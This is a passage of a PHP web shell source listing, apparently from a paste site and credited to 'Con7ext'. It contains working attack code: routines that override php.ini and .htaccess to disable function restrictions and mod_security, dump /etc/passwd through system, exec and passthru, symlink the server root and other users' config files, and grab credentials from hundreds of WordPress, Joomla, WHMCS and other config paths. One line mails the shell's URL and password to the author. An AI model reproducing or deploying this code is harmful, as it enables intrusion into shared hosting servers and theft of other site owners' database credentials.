ud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9YnJ1ZHVsLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx";
  659.         $sym = fopen($file_sym, "w");
  660.     fwrite($sym, base64_decode($sym_script));
  661.     chmod($file_sym, 0755);
  662.         $jancok = exe("python sym.py");
  663.         echo "<div id='menu'><center><a href='?path=$path&symlink=server'>Symlink Server</a><a href='?path=$path&symlink=404'>Symlink 404</a><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  664.     echo "<br><center>Done ... <a href='con7ext_sympy/brudulsympy/' target='_blank'>Klik Here</a>";
  665. } elseif($_GET['bypass'] == 'disablefunc'){
  666.                 echo "<div id='menu'><center><a href='?path=$path&bypass=disablefunc'>Disable Functions</a><a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a><a href='?path=$path&bypass=vhosts'>Bypass Vhosts</a></div>";
  667.         echo "<br><br><center>";
  668.         echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' />&nbsp;<input type=submit name=litini value='Litespeed' /></form>";
  669.         if(isset($_POST['ini']))
  670. {
  671.         $file = fopen("php.ini","w");
  672.         echo fwrite($file,"disable_functions=none
  673. safe_mode = Off
  674.     ");
  675.         fclose($file);
  676.         echo "<a href='php.ini'>click here!</a>";
  677. }       if(isset($_POST['htce']))
  678. {
  679.         $file = fopen(".htaccess","w");
  680.         echo fwrite($file,"<IfModule mod_security.c>
  681. SecFilterEngine Off
  682. SecFilterScanPOST Off
  683. </IfModule>
  684.     ");
  685.         fclose($file);
  686.         echo "htaccess successfully created!";
  687. }               if(isset($_POST['litini'])){
  688.         $iniph = '<? n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["file"]); n ini_restore("safe_mode"); n ini_restore("open_basedir"); n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["ss"]; n ?>';
  689.              $byph = "safe_mode = Off n disable_functions= ";
  690.         $comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";
  691.         file_put_contents("php.ini",base64_decode($byph));
  692.         file_put_contents("ini.php",base64_decode($iniph));
  693.         file_put_contents(".htaccess",base64_decode($comp));
  694.         echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
  695.         echo"</center>";
  696. }
  697. }elseif($_GET['bypass'] == 'tool'){
  698. echo "<div id='menu'><center>";
  699. echo "<a href='?path=$path&bypass=disablefunc'>Disable Functions</a><a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a><a href='?path=$path&bypass=vhosts'>Bypass Vhosts</a></div>";
  700. } elseif($_GET['symlink'] == 'tool'){
  701. echo "<div id='menu'><center>";
  702. echo "<a href='?path=$path&symlink=server'>Symlink Server</a><a href='?path=$path&symlink=404'>Symlink 404</a><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  703. } elseif ($_GET['symlink'] == '404'){
  704. @error_reporting(0);
  705. @ini_set('display_errors', 0);
  706. echo "<div id='menu'><center><a href='?path=$path&symlink=server'>Symlink Server</a><a href='?path=$path&symlink=404'>Symlink 404</a><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  707. echo '<center><b><a href="https://www.facebook.com/rinto2234">Coded By Con7ext</a></b><br>
  708. <form method="post"><br>File Target : <input name="dir" value="/home/user/public_html/wp-config.php">
  709. <br>
  710. <br>Save As: <input name="jnck" value="ojayakan.txt"><input name="ojaykan" type="submit" value="Eksekusi Gan"></form><br>';
  711. if($_POST['ojaykan']){
  712. rmdir("con7ext_symlink404");mkdir("con7ext_symlink404", 0777);
  713. $dir = $_POST['dir'];
  714. $jnck = $_POST['jnck'];
  715. system("ln -s ".$dir." con7ext_symlink404/".$jnck);
  716. symlink($dir,"con7ext_symlink404/".$jnck);
  717. $inija = fopen("con7ext_symlink404/.htaccess", "w");
  718. fwrite($inija,"ReadmeName ".$jnck."
  719. Options Indexes FollowSymLinks
  720. DirectoryIndex ngeue.htm
  721. AddType text/plain .php
  722. AddHandler text/plain .php
  723. Satisfy Any
  724. ");
  725. echo'<a href="con7ext_symlink404/" target="_blank">Klik Gan >:(</a>';
  726. }
  727. }elseif($_GET['bypass'] == 'passwd') {
  728.         echo '<div id="menu"><center><a href="?path=$path&bypass=disablefunc">Disable Functions</a><a href="?path=$path&bypass=passwd">Bypass /etc/passwd</a><a href="?path=$path&bypass=vhosts">Bypass Vhosts</a></div>';
  729.     echo '<br><br><center>Bypass etc/passw With:<br>
  730. <table style="width:50%">
  731.   <tr>
  732.     <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  733.     <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  734.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  735.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  736.     <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  737. </tr></table>Bypass User With : <table style="width:50%">
  738. <tr>
  739.     <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  740.     <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  741.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  742.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  743.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  744. </tr>
  745. </table><br>';
  746.  
  747.  
  748. if ($_POST['awkuser']) {
  749. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  750. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  751. echo "</textarea><br>";
  752. }
  753. if ($_POST['systuser']) {
  754. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  755. echo system("ls /var/mail");
  756. echo "</textarea><br>";
  757. }
  758. if ($_POST['passthuser']) {
  759. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  760. echo passthru("ls /var/mail");
  761. echo "</textarea><br>";
  762. }
  763. if ($_POST['exuser']) {
  764. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  765. echo exec("ls /var/mail");
  766. echo "</textarea><br>";
  767. }
  768. if ($_POST['shexuser']) {
  769. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  770. echo shell_exec("ls /var/mail");
  771. echo "</textarea><br>";
  772. }
  773. if($_POST['syst'])
  774. {
  775. echo"<textarea class='inputz' cols='65' rows='15'>";
  776. echo system("cat /etc/passwd");
  777. echo"</textarea><br><br><b></b><br>";
  778. }
  779. if($_POST['passth'])
  780. {
  781. echo"<textarea class='inputz' cols='65' rows='15'>";
  782. echo passthru("cat /etc/passwd");
  783. echo"</textarea><br><br><b></b><br>";
  784. }
  785. if($_POST['ex'])
  786. {
  787. echo"<textarea class='inputz' cols='65' rows='15'>";
  788. echo exec("cat /etc/passwd");
  789. echo"</textarea><br><br><b></b><br>";
  790. }
  791. if($_POST['shex'])
  792. {
  793. echo"<textarea class='inputz' cols='65' rows='15'>";
  794. echo shell_exec("cat /etc/passwd");
  795. echo"</textarea><br><br><b></b><br>";
  796. }
  797. echo '<center>';
  798. if($_POST['melex'])
  799. {
  800. echo"<textarea class='inputz' cols='65' rows='15'>";
  801. for($uid=0;$uid<60000;$uid++){
  802. $ara = posix_getpwuid($uid);
  803. if (!empty($ara)) {
  804. while (list ($key, $val) = each($ara)){
  805. print "$val:";
  806. }
  807. print "\n";
  808. }
  809. }
  810. echo"</textarea><br><br>";
  811. }
  812. } elseif($_GET['kill'] == 'self') {
  813.     if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  814.             die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  815.         else
  816.             echo '<center>unlink failed!</center>';
  817. }
  818. elseif($_GET['symlink'] == 'server') {
  819. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  820. $d0mains = @file("/etc/named.conf");
  821. mail($author,'[Dont Edit!]','URL : '.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].' PASSWORD : '.$auth_pass.'','admin@google.com');
  822. ##httaces
  823. if($d0mains){
  824. @mkdir("con7ext_sym",0777);
  825. @chdir("con7ext_sym");
  826. @exe("ln -s / root");
  827. $file3 = 'Options Indexes FollowSymLinks
  828. DirectoryIndex con7ext.htm
  829. AddType text/plain .php
  830. AddHandler text/plain .php
  831. Satisfy Any';
  832. $fp3 = fopen('.htaccess','w');
  833. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  834. echo "<div id='menu'><center><a href='?path=$path&symlink=server'>Symlink Server</a><a href='?path=$path&symlink=404'>Symlink 404</a><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  835. echo "<br>
  836. <table align=center border=1 style='width:60%;border-color:#333333;'>
  837. <tr>
  838. <td align=center><font size=2>S. No.</font></td>
  839. <td align=center><font size=2>Domains</font></td>
  840. <td align=center><font size=2>Users</font></td>
  841. <td align=center><font size=2>Symlink</font></td>
  842. </tr>";
  843. $dcount = 1;
  844. foreach($d0mains as $d0main){
  845. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  846. flush();
  847. if(strlen(trim($domains[1][0])) > 2){
  848. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  849. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  850. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  851. <td>".$user['name']."</td>
  852. <td><a href='$full/con7ext_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  853. flush();
  854. $dcount++;}}}
  855. echo "</table>";
  856. }else{
  857. $TEST=@file('/etc/passwd');
  858. if ($TEST){
  859. @mkdir("con7ext_sym",0777);
  860. @chdir("con7ext_sym");
  861. exe("ln -s / root");
  862. $file3 = 'Options Indexes FollowSymLinks
  863. DirectoryIndex con7ext.htm
  864. AddType text/plain .php
  865. AddHandler text/plain .php
  866. Satisfy Any';
  867.  $fp3 = fopen('.htaccess','w');
  868.  $fw3 = fwrite($fp3,$file3);
  869.  @fclose($fp3);
  870.  echo "
  871.  <table align=center border=1><tr>
  872.  <td align=center><font size=3>S. No.</font></td>
  873.  <td align=center><font size=3>Users</font></td>
  874.  <td align=center><font size=3>Symlink</font></td></tr>";
  875.  $dcount = 1;
  876.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  877.  while(!feof($file)){
  878.  $s = fgets($file);
  879.  $matches = array();
  880.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  881.  $matches = str_replace("home/","",$matches[1]);
  882.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  883.  continue;
  884.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  885.  <td align=center><font class=txt>" . $matches . "</td>";
  886.  echo "<td align=center><font class=txt><a href=$full/con7ext_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  887.  $dcount++;}fclose($file);
  888.  echo "</table>";}else{if($os != "Windows"){@mkdir("con7ext_sym",0777);@chdir("con7ext_sym");@exe("ln -s / root");$file3 = '
  889.  Options Indexes FollowSymLinks
  890. DirectoryIndex con7ext.htm
  891. AddType text/plain .php
  892. AddHandler text/plain .php
  893. Satisfy Any
  894. ';
  895.  $fp3 = fopen('.htaccess','w');
  896.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  897.  echo "
  898.  <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  899.  <table align=center border=1><tr>
  900.  <td align=center><font size=3>ID</font></td>
  901.  <td align=center><font size=3>Users</font></td>
  902.  <td align=center><font size=3>Symlink</font></td></tr>";
  903.  $temp = "";$val1 = 0;$val2 = 1000;
  904.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  905.  if ($uid)$temp .= join(':',$uid)."\n";}
  906.  echo '<br/>';$temp = trim($temp);$file5 =
  907.  fopen("test.txt","w");
  908.  fputs($file5,$temp);
  909.  fclose($file5);$dcount = 1;$file =
  910.  fopen("test.txt", "r") or exit("Unable to open file!");
  911.  while(!feof($file)){$s = fgets($file);$matches = array();
  912.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  913.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  914.  continue;
  915.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  916.  <td align=center><font class=txt>" . $matches . "</td>";
  917.  echo "<td align=center><font class=txt><a href=$full/con7ext_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  918.  $dcount++;}
  919.  fclose($file);
  920.  echo "</table></div></center>";unlink("test.txt");
  921.  } else
  922.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  923.  }
  924.  }
  925. } elseif($_GET['config'] == 'grabber') {
  926.             if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  927. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  928. exit;
  929. }
  930.     if($_POST){ if($_POST['config'] == 'symvhosts') {
  931.         @mkdir("con7ext_symvhosts", 0777);
  932. exe("ln -s / con7ext_symvhosts/root");
  933. $htaccess="Options Indexes FollowSymLinks
  934. DirectoryIndex con7ext.htm
  935. AddType text/plain .php
  936. AddHandler text/plain .php
  937. Satisfy Any";
  938. @file_put_contents("con7ext_symvhosts/.htaccess",$htaccess);
  939.         $etc_passwd=$_POST['passwd'];
  940.    
  941.     $etc_passwd=explode("\n",$etc_passwd);
  942. foreach($etc_passwd as $passwd){
  943. $pawd=explode(":",$passwd);
  944. $user =$pawd[5];
  945. $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  946. if (preg_match('/vhosts/i',$user)){
  947. exe("ln -s ".$user."/httpdocs/wp-config.php con7ext_symvhosts/".$jembod."-Wordpress.txt");
  948. exe("ln -s ".$user."/httpdocs/configuration.php con7ext_symvhosts/".$jembod."-Joomla.txt");
  949. exe("ln -s ".$user."/httpdocs/config/koneksi.php con7ext_symvhosts/".$jembod."-Lokomedia.txt");
  950. exe("ln -s ".$user."/httpdocs/forum/config.php con7ext_symvhosts/".$jembod."-phpBB.txt");
  951. exe("ln -s ".$user."/httpdocs/sites/default/settings.php con7ext_symvhosts/".$jembod."-Drupal.txt");
  952. exe("ln -s ".$user."/httpdocs/config/settings.inc.php con7ext_symvhosts/".$jembod."-PrestaShop.txt");
  953. exe("ln -s ".$user."/httpdocs/app/etc/local.xml con7ext_symvhosts/".$jembod."-Magento.txt");
  954. exe("ln -s ".$user."/httpdocs/admin/config.php con7ext_symvhosts/".$jembod."-OpenCart.txt");
  955. exe("ln -s ".$user."/httpdocs/application/config/database.php con7ext_symvhosts/".$jembod."-Ellislab.txt");
  956. }}}
  957. if($_POST['config'] == 'symlink') {
  958. @mkdir("con7ext_symconfig", 0777);
  959. @symlink("/","con7ext_symconfig/root");
  960. $htaccess="Options Indexes FollowSymLinks
  961. DirectoryIndex con7ext.htm
  962. AddType text/plain .php
  963. AddHandler text/plain .php
  964. Satisfy Any";
  965. @file_put_contents("con7ext_symconfig/.htaccess",$htaccess);}
  966. if($_POST['config'] == '404') {
  967. @mkdir("con7ext_sym404", 0777);
  968. @symlink("/","con7ext_sym404/root");
  969. $htaccess="Options Indexes FollowSymLinks
  970. DirectoryIndex con7ext.htm
  971. AddType text/plain .php
  972. AddHandler text/plain .php
  973. Satisfy Any
  974. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  975. IndexIgnore *.txt404
  976. RewriteEngine On
  977. RewriteCond %{REQUEST_FILENAME} ^.*con7ext_sym404 [NC]
  978. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  979. @file_put_contents("con7ext_sym404/.htaccess",$htaccess);
  980. }
  981. if($_POST['config'] == 'grab') {
  982.                         mkdir("con7ext_configgrab", 0777);
  983.                         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  984.                         $htc = fopen("con7ext_configgrab/.htaccess","w");
  985.                         fwrite($htc, $isi_htc);
  986. }
  987. $passwd = $_POST['passwd'];
  988.  
  989. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  990. foreach($user_config[1] as $user_con7ext) {
  991. $grab_config = array(
  992. "/home/$user_con7ext/.accesshash" => "WHM-accesshash",
  993. "/home/$user_con7ext/public_html/config/koneksi.php" => "Lokomedia",
  994. "/home/$user_con7ext/public_html/forum/config.php" => "phpBB",
  995. "/home/$user_con7ext/public_html/sites/default/settings.php" => "Drupal",
  996. "/home/$user_con7ext/public_html/config/settings.inc.php" => "PrestaShop",
  997. "/home/$user_con7ext/public_html/app/etc/local.xml" => "Magento",
  998. "/home/$user_con7ext/public_html/admin/config.php" => "OpenCart",
  999. "/home/$user_con7ext/public_html/application/config/database.php" => "Ellislab",
  1000. "/home/$user_con7ext/public_html/vb/includes/config.php" => "Vbulletin",
  1001. "/home/$user_con7ext/public_html/includes/config.php" => "Vbulletin",
  1002. "/home/$user_con7ext/public_html/forum/includes/config.php" => "Vbulletin",
  1003. "/home/$user_con7ext/public_html/forums/includes/config.php" => "Vbulletin",
  1004. "/home/$user_con7ext/public_html/cc/includes/config.php" => "Vbulletin",
  1005. "/home/$user_con7ext/public_html/inc/config.php" => "MyBB",
  1006. "/home/$user_con7ext/public_html/includes/configure.php" => "OsCommerce",
  1007. "/home/$user_con7ext/public_html/shop/includes/configure.php" => "OsCommerce",
  1008. "/home/$user_con7ext/public_html/os/includes/configure.php" => "OsCommerce",
  1009. "/home/$user_con7ext/public_html/oscom/includes/configure.php" => "OsCommerce",
  1010. "/home/$user_con7ext/public_html/products/includes/configure.php" => "OsCommerce",
  1011. "/home/$user_con7ext/public_html/cart/includes/configure.php" => "OsCommerce",
  1012. "/home/$user_con7ext/public_html/inc/conf_global.php" => "IPB",
  1013. "/home/$user_con7ext/public_html/wp-config.php" => "Wordpress",
  1014. "/home/$user_con7ext/public_html/wp/test/wp-config.php" => "Wordpress",
  1015. "/home/$user_con7ext/public_html/blog/wp-config.php" => "Wordpress",
  1016. "/home/$user_con7ext/public_html/beta/wp-config.php" => "Wordpress",
  1017. "/home/$user_con7ext/public_html/portal/wp-config.php" => "Wordpress",
  1018. "/home/$user_con7ext/public_html/site/wp-config.php" => "Wordpress",
  1019. "/home/$user_con7ext/public_html/wp/wp-config.php" => "Wordpress",
  1020. "/home/$user_con7ext/public_html/WP/wp-config.php" => "Wordpress",
  1021. "/home/$user_con7ext/public_html/news/wp-config.php" => "Wordpress",
  1022. "/home/$user_con7ext/public_html/wordpress/wp-config.php" => "Wordpress",
  1023. "/home/$user_con7ext/public_html/test/wp-config.php" => "Wordpress",
  1024. "/home/$user_con7ext/public_html/demo/wp-config.php" => "Wordpress",
  1025. "/home/$user_con7ext/public_html/home/wp-config.php" => "Wordpress",
  1026. "/home/$user_con7ext/public_html/v1/wp-config.php" => "Wordpress",
  1027. "/home/$user_con7ext/public_html/v2/wp-config.php" => "Wordpress",
  1028. "/home/$user_con7ext/public_html/press/wp-config.php" => "Wordpress",
  1029. "/home/$user_con7ext/public_html/new/wp-config.php" => "Wordpress",
  1030. "/home/$user_con7ext/public_html/blogs/wp-config.php" => "Wordpress",
  1031. "/home/$user_con7ext/public_html/configuration.php" => "Joomla",
  1032. "/home/$user_con7ext/public_html/blog/configuration.php" => "Joomla",
  1033. "/home/$user_con7ext/public_html/submitticket.php" => "^WHMCS",
  1034. "/home/$user_con7ext/public_html/cms/configuration.php" => "Joomla",
  1035. "/home/$user_con7ext/public_html/beta/configuration.php" => "Joomla",
  1036. "/home/$user_con7ext/public_html/portal/configuration.php" => "Joomla",
  1037. "/home/$user_con7ext/public_html/site/configuration.php" => "Joomla",
  1038. "/home/$user_con7ext/public_html/main/configuration.php" => "Joomla",
  1039. "/home/$user_con7ext/public_html/home/configuration.php" => "Joomla",
  1040. "/home/$user_con7ext/public_html/demo/configuration.php" => "Joomla",
  1041. "/home/$user_con7ext/public_html/test/configuration.php" => "Joomla",
  1042. "/home/$user_con7ext/public_html/v1/configuration.php" => "Joomla",
  1043. "/home/$user_con7ext/public_html/v2/configuration.php" => "Joomla",
  1044. "/home/$user_con7ext/public_html/joomla/configuration.php" => "Joomla",
  1045. "/home/$user_con7ext/public_html/new/configuration.php" => "Joomla",
  1046. "/home/$user_con7ext/public_html/WHMCS/submitticket.php" => "WHMCS",
  1047. "/home/$user_con7ext/public_html/whmcs1/submitticket.php" => "WHMCS",
  1048. "/home/$user_con7ext/public_html/Whmcs/submitticket.php" => "WHMCS",
  1049. "/home/$user_con7ext/public_html/whmcs/submitticket.php" => "WHMCS",
  1050. "/home/$user_con7ext/public_html/whmcs/submitticket.php" => "WHMCS",
  1051. "/home/$user_con7ext/public_html/WHMC/submitticket.php" => "WHMCS",
  1052. "/home/$user_con7ext/public_html/Whmc/submitticket.php" => "WHMCS",
  1053. "/home/$user_con7ext/public_html/whmc/submitticket.php" => "WHMCS",
  1054. "/home/$user_con7ext/public_html/WHM/submitticket.php" => "WHMCS",
  1055. "/home/$user_con7ext/public_html/Whm/submitticket.php" => "WHMCS",
  1056. "/home/$user_con7ext/public_html/whm/submitticket.php" => "WHMCS",
  1057. "/home/$user_con7ext/public_html/HOST/submitticket.php" => "WHMCS",
  1058. "/home/$user_con7ext/public_html/Host/submitticket.php" => "WHMCS",
  1059. "/home/$user_con7ext/public_html/host/submitticket.php" => "WHMCS",
  1060. "/home/$user_con7ext/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1061. "/home/$user_con7ext/public_html/Supportes/submitticket.php" => "WHMCS",
  1062. "/home/$user_con7ext/public_html/supportes/submitticket.php" => "WHMCS",
  1063. "/home/$user_con7ext/public_html/domains/submitticket.php" => "WHMCS",
  1064. "/home/$user_con7ext/public_html/domain/submitticket.php" => "WHMCS",
  1065. "/home/$user_con7ext/public_html/Hosting/submitticket.php" => "WHMCS",
  1066. "/home/$user_con7ext/public_html/HOSTING/submitticket.php" => "WHMCS",
  1067. "/home/$user_con7ext/public_html/hosting/submitticket.php" => "WHMCS",
  1068. "/home/$user_con7ext/public_html/CART/submitticket.php" => "WHMCS",
  1069. "/home/$user_con7ext/public_html/Cart/submitticket.php" => "WHMCS",
  1070. "/home/$user_con7ext/public_html/cart/submitticket.php" => "WHMCS",
  1071. "/home/$user_con7ext/public_html/ORDER/submitticket.php" => "WHMCS",
  1072. "/home/$user_con7ext/public_html/Order/submitticket.php" => "WHMCS",
  1073. "/home/$user_con7ext/public_html/order/submitticket.php" => "WHMCS",
  1074. "/home/$user_con7ext/public_html/CLIENT/submitticket.php" => "WHMCS",
  1075. "/home/$user_con7ext/public_html/Client/submitticket.php" => "WHMCS",
  1076. "/home/$user_con7ext/public_html/client/submitticket.php" => "WHMCS",
  1077. "/home/$user_con7ext/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1078. "/home/$user_con7ext/public_html/Clientarea/submitticket.php" => "WHMCS",
  1079. "/home/$user_con7ext/public_html/clientarea/submitticket.php" => "WHMCS",
  1080. "/home/$user_con7ext/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1081. "/home/$user_con7ext/public_html/Support/submitticket.php" => "WHMCS",
  1082. "/home/$user_con7ext/public_html/support/submitticket.php" => "WHMCS",
  1083. "/home/$user_con7ext/public_html/BILLING/submitticket.php" => "WHMCS",
  1084. "/home/$user_con7ext/public_html/Billing/submitticket.php" => "WHMCS",
  1085. "/home/$user_con7ext/public_html/billing/submitticket.php" => "WHMCS",
  1086. "/home/$user_con7ext/public_html/BUY/submitticket.php" => "WHMCS",
  1087. "/home/$user_con7ext/public_html/Buy/submitticket.php" => "WHMCS",
  1088. "/home/$user_con7ext/public_html/buy/submitticket.php" => "WHMCS",
  1089. "/home/$user_con7ext/public_html/MANAGE/submitticket.php" => "WHMCS",
  1090. "/home/$user_con7ext/public_html/Manage/submitticket.php" => "WHMCS",
  1091. "/home/$user_con7ext/public_html/manage/submitticket.php" => "WHMCS",
  1092. "/home/$user_con7ext/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1093. "/home/$user_con7ext/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1094. "/home/$user_con7ext/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1095. "/home/$user_con7ext/public_html/clientsupport/submitticket.php" => "WHMCS",
  1096. "/home/$user_con7ext/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1097. "/home/$user_con7ext/public_html/Checkout/submitticket.php" => "WHMCS",
  1098. "/home/$user_con7ext/public_html/checkout/submitticket.php" => "WHMCS",
  1099. "/home/$user_con7ext/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1100. "/home/$user_con7ext/public_html/Billings/submitticket.php" => "WHMCS",
  1101. "/home/$user_con7ext/public_html/billings/submitticket.php" => "WHMCS",
  1102. "/home/$user_con7ext/public_html/BASKET/submitticket.php" => "WHMCS",
  1103. "/home/$user_con7ext/public_html/Basket/submitticket.php" => "WHMCS",
  1104. "/home/$user_con7ext/public_html/basket/submitticket.php" => "WHMCS",
  1105. "/home/$user_con7ext/public_html/SECURE/submitticket.php" => "WHMCS",
  1106. "/home/$user_con7ext/public_html/Secure/submitticket.php" => "WHMCS",
  1107. "/home/$user_con7ext/public_html/secure/submitticket.php" => "WHMCS",
  1108. "/home/$user_con7ext/public_html/SALES/submitticket.php" => "WHMCS",
  1109. "/home/$user_con7ext/public_html/Sales/submitticket.php" => "WHMCS",
  1110. "/home/$user_con7ext/public_html/sales/submitticket.php" => "WHMCS",
  1111. "/home/$user_con7ext/public_html/BILL/submitticket.php" => "WHMCS",
  1112. "/home/$user_con7ext/public_html/Bill/submitticket.php" => "WHMCS",
  1113. "/home/$user_con7ext/public_html/bill/submitticket.php" => "WHMCS",
  1114. "/home/$user_con7ext/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1115. "/home/$user_con7ext/public_html/Purchase/submitticket.php" => "WHMCS",
  1116. "/home/$user_con7ext/public_html/purchase/submitticket.php" => "WHMCS",
  1117. "/home/$user_con7ext/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1118. "/home/$user_con7ext/public_html/Account/submitticket.php" => "WHMCS",
  1119. "/home/$user_con7ext/public_html/account/submitticket.php" => "WHMCS",
  1120. "/home/$user_con7ext/public_html/USER/submitticket.php" => "WHMCS",
  1121. "/home/$user_con7ext/public_html/User/submitticket.php" => "WHMCS",
  1122. "/home/$user_con7ext/public_html/user/submitticket.php" => "WHMCS",
  1123. "/home/$user_con7ext/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1124. "/home/$user_con7ext/public_html/Clients/submitticket.php" => "WHMCS",
  1125. "/home/$user_con7ext/public_html/clients/submitticket.php" => "WHMCS",
  1126. "/home/$user_con7ext/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1127. "/home/$user_con7ext/public_html/Billings/submitticket.php" => "WHMCS",
  1128. "/home/$user_con7ext/public_html/billings/submitticket.php" => "WHMCS",
  1129. "/home/$user_con7ext/public_html/MY/submitticket.php" => "WHMCS",
  1130. "/home/$user_con7ext/public_html/My/submitticket.php" => "WHMCS",
  1131. "/home/$user_con7ext/public_html/my/submitticket.php" => "WHMCS",
  1132. "/home/$user_con7ext/public_html/secure/whm/submitticket.php" => "WHMCS",
  1133. "/home/$user_con7ext/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1134. "/home/$user_con7ext/public_html/panel/submitticket.php" => "WHMCS",
  1135. "/home/$user_con7ext/public_html/clientes/submitticket.php" => "WHMCS",
  1136. "/home/$user_con7ext/public_html/cliente/submitticket.php" => "WHMCS",
  1137. "/home/$user_con7ext/public_html/support/order/submitticket.php" => "WHMCS",
  1138. "/home/$user_con7ext/public_html/bb-config.php" => "BoxBilling",
  1139. "/home/$user_con7ext/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1140. "/home/$user_con7ext/public_html/box/bb-config.php" => "BoxBilling",
  1141. "/home/$user_con7ext/public_html/host/bb-config.php" => "BoxBilling",
  1142. "/home/$user_con7ext/public_html/Host/bb-config.php" => "BoxBilling",
  1143. "/home/$user_con7ext/public_html/supportes/bb-config.php" => "BoxBilling",
  1144. "/home/$user_con7ext/public_html/support/bb-config.php" => "BoxBilling",
